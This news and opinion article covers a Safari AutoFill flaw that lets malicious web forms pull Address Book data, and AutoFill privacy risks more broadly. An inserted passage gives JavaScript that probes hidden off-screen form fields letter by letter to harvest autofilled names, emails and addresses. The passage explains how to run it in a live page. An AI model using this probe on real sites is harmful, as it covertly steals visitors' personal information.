A security researcher has revealed a weakness in Apple’s Safari Web browser that an attacker can exploit to extract sensitive personal information. The Safari vulnerability is more severe than the usual AutoFill quirk, but it illustrates the underlying privacy and security concerns with AutoFill in general.
Jeremiah Grossman, founder and CTO of WhiteHat Security, reported that an attacker can use a malicious Web form to make Safari AutoFill sensitive information such as name, address, or e-mail address from the data stored in the Apple Address Book. The issue stems from the option to fill out forms “Using info from my Address Book card,” which is checked by default in Safari.
Grossman suggests that the issue affects all browsers built on the open source WebKit engine, including Safari on both Mac OS X and iOS as well as the Google Chrome browser. However, the proof-of-concept does not work on the most recent version of Chrome, and it requires user intervention to work on iOS.
The upside is that this security flaw seems confined, more or less, to the Safari Web browser running on Mac OS X. And since Mac OS X makes up only about five percent of the operating system market, and not all Mac OS X users rely on Safari for browsing the Web, the issue has a relatively small potential impact.
As Grossman points out in his blog post on the Safari AutoFill hack, what sets this issue apart from the AutoFill capabilities of other browsers and operating systems is that Safari will surrender sensitive data to an attacker’s malicious Web site “even if they’ve never been there before or entered any personal information.”
The fact that the Safari hack can reveal information that was never typed into a given field makes it a more serious issue, but the reality is that every AutoFill feature, in every browser and operating system, is a security and privacy concern on some level. AutoFill trades some security and privacy for convenience.
AutoFill is designed to make life simpler by storing information so it can be entered automatically the next time it is needed. It is most often encountered with form data: name, address, phone number, e-mail address, and so on. Once the data is stored, the next time a similar form field is encountered, clicking on the field reveals a list of the stored entries, or beginning to type fills in the stored entry that matches what has been typed so far.
In a manner similar to the Safari AutoFill hack Grossman describes, an attacker could also extract information a user has stored in AutoFill by creating a malicious Web form with commonly named fields and invisibly testing each letter of the alphabet in each field to see which AutoFill entries exist.
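The letter-by-letter probing just described, as an added example that is not Grossman’s proof-of-concept or any code from the original article. The harvesting loop is separated from the browser so it can run on its own against a constructed stand-in for an Address Book card; the field names, the sample card, and the off-screen DOM driver are all assumptions of this example.

```javascript
// Added example, not Grossman's proof-of-concept: the letter-by-letter
// AutoFill probe described in the text, with the browser interaction
// abstracted behind a "typer" function so the harvesting logic itself can
// run and be checked outside a browser.

const LETTERS = 'abcdefghijklmnopqrstuvwxyz'.split('');

// Field names an attacker would guess because AutoFill engines recognise
// them. Assumed list for this example; a real page could try many more.
const COMMON_FIELDS = ['name', 'email', 'address', 'city', 'phone'];

// Probe every field one letter at a time. typeAndRead(field, letter) must
// "type" that single letter into the field and return the field's value
// afterwards; a value longer than the letter means AutoFill completed it.
// Returns the harvested entries plus how many probes the run cost.
function harvestAutofill(fieldNames, typeAndRead, letters = LETTERS) {
  const leaked = {};
  let probes = 0;
  for (const field of fieldNames) {
    for (const letter of letters) {
      probes += 1;
      const value = typeAndRead(field, letter);
      if (value.length > letter.length &&
          value.toLowerCase().startsWith(letter.toLowerCase())) {
        leaked[field] = value;   // AutoFill filled in more than we typed
        break;                   // one hit per field is all we need
      }
    }
  }
  return { leaked, probes };
}

// Constructed stand-in for a browser's AutoFill store. It completes a field
// to the stored entry whenever the typed letter matches the entry's first
// letter, mirroring the fill-on-first-keystroke behaviour the article
// describes, and otherwise leaves just the typed letter in the field.
function makeMockTyper(card) {
  return (field, letter) => {
    const entry = card[field];
    if (entry && entry.toLowerCase().startsWith(letter.toLowerCase())) {
      return entry;
    }
    return letter;
  };
}

// The "invisible" part, for use inside a page: one off-screen <input> per
// field, a synthetic keystroke, then read .value back. This driver is an
// assumption of the example. Script-generated key events are untrusted and
// a browser need not run AutoFill for them, which is consistent with the
// article's note that the proof-of-concept fails on current Chrome.
function makeBrowserTyper(doc) {
  const form = doc.createElement('form');
  form.style.cssText = 'position:absolute;left:-9999px;top:-9999px';
  doc.body.appendChild(form);
  const inputs = {};
  return (field, letter) => {
    if (!inputs[field]) {
      const input = doc.createElement('input');
      input.type = 'text';
      input.name = field;
      input.autocomplete = 'on';
      form.appendChild(input);
      inputs[field] = input;
    }
    const input = inputs[field];
    input.value = letter;
    input.focus();
    input.dispatchEvent(new KeyboardEvent('keyup', { key: letter, bubbles: true }));
    return input.value;
  };
}

// Constructed sample Address Book card for the offline demonstration.
const SAMPLE_CARD = {
  name: 'Alice Example',
  email: 'alice@example.invalid',
  city: 'Springfield',
};

// Run the probe against the mock store: three fields leak, two come up empty.
function demoHarvest() {
  return harvestAutofill(COMMON_FIELDS, makeMockTyper(SAMPLE_CARD));
}

console.log(demoHarvest());
// { leaked: { name: 'Alice Example', email: 'alice@example.invalid',
//             city: 'Springfield' }, probes: 73 }
```

In a page, `makeBrowserTyper(document)` would replace the mock typer; nothing else changes. The break after the first hit keeps the cost to at most 26 probes per field, and a field that has no stored entry costs all 26, so the total probe count also tells an attacker which fields the store knows nothing about.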
AutoFill may reveal sensitive information in other ways too. The AutoFill feature of the Web browser address bar may reveal URLs that have been visited, and the AutoFill feature in programs like Microsoft Excel could expose data previously entered in other cells.
I am not suggesting that everyone abandon AutoFill and go back to tediously typing in the same information every time the need arises. I am, however, advocating that IT admins and users in general understand that the same features that provide convenience for the user also make it more convenient for an attacker to breach or compromise the data stored there.